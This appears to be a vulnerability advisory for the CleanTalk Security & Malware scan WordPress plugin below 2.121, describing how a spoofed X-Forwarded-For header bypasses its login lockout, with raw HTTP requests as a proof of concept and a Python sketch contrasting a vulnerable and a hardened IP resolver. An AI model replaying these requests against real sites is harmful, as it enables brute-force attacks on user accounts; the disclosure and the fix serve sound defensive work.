wpexploit | Bartlomiej Marek | WPEX-ID: 1D748F91-773B-49D6-8F68-A27D397713C3
Published: Nov 06, 2023

Security & Malware scan by CleanTalk < 2.121 - IP Spoofing

Tags: cleantalk malwarescan, ip spoofing, invalid logins, security logs, cleantalk < 2.121, x-forwarded header

EPSS: 0.0005 (Low), percentile 17.8%

Description: The plugin determines the client IP address from headers that can be set by the client itself (such as X-Forwarded-For), so an attacker can supply an arbitrary value. Because the brute-force protection keys its lockout on that address, the protection can be bypassed.

Step 1: Send 5 invalid login requests so that the plugin blocks the source IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Step 2: Send another login request from the same source, this time with an X-Forwarded-For header carrying a spoofed IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
X-Forwarded-For: 8.8.8.8

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Step 3: Check the plugin's security log at /wp-admin/options-general.php?page=spbc&spbc_tab=security_log to see which address the second request was attributed to.
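The weakness described above, worked through as an added example that is not the plugin's code: a naive client-IP resolver that trusts any X-Forwarded-For header beside a hardened one that honours the header only when the TCP peer is a configured proxy, with a five-failure lockout replaying the two requests. The proxy address 10.0.0.5 and the peer 203.0.113.7 are constructed values.

```python
import ipaddress

# Constructed example: the only hop allowed to set X-Forwarded-For is our load balancer.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_client_ip(remote_addr, headers):
    """Vulnerable pattern: any peer's X-Forwarded-For overrides the TCP source."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()  # attacker-chosen value
    return remote_addr


def hardened_client_ip(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and
    walk the chain right-to-left so that only hops our proxies appended count."""
    if ipaddress.ip_address(remote_addr) not in TRUSTED_PROXIES:
        return remote_addr  # direct connection: the header is untrusted
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed entry: fall back to the TCP peer
        if addr not in TRUSTED_PROXIES:
            return str(addr)  # first hop not added by us is the client
    return remote_addr


class LoginLimiter:
    """Blocks an IP after `limit` failed logins, keyed on the resolver's answer."""

    def __init__(self, resolver, limit=5):
        self.resolver, self.limit, self.failures = resolver, limit, {}

    def record_failure(self, remote_addr, headers):
        ip = self.resolver(remote_addr, headers)
        self.failures[ip] = self.failures.get(ip, 0) + 1

    def is_blocked(self, remote_addr, headers):
        return self.failures.get(self.resolver(remote_addr, headers), 0) >= self.limit


def sixth_attempt_blocked(resolver):
    """Replay the advisory's steps: five bad logins from one address, then a sixth
    from the same address carrying 'X-Forwarded-For: 8.8.8.8' (constructed peer)."""
    limiter = LoginLimiter(resolver)
    for _ in range(5):
        limiter.record_failure("203.0.113.7", {})
    return limiter.is_blocked("203.0.113.7", {"X-Forwarded-For": "8.8.8.8"})
```

With the naive resolver the sixth request is attributed to 8.8.8.8 and slips past the lockout; with the hardened resolver it stays attributed to the real peer and is blocked.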
